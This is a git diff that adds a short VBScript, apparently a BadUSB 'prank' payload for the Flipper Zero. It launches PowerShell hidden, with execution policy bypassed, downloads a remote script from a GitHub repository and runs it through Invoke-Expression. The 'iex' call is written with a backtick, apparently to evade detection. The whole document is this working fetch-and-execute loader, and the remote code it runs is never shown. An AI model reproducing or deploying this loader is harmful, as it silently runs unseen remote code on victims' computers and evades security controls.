diff --git a/Windows-Idiot-Prank/idiot.vbs b/Windows-Idiot-Prank/idiot.vbs new file mode 100644 index 0000000..4a32dbf --- /dev/null +++ b/Windows-Idiot-Prank/idiot.vbs @@ -0,0 +1,4 @@ +Set WshShell = WScript.CreateObject("WScript.Shell") +WScript.Sleep 200 +WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | i`ex", 0, True +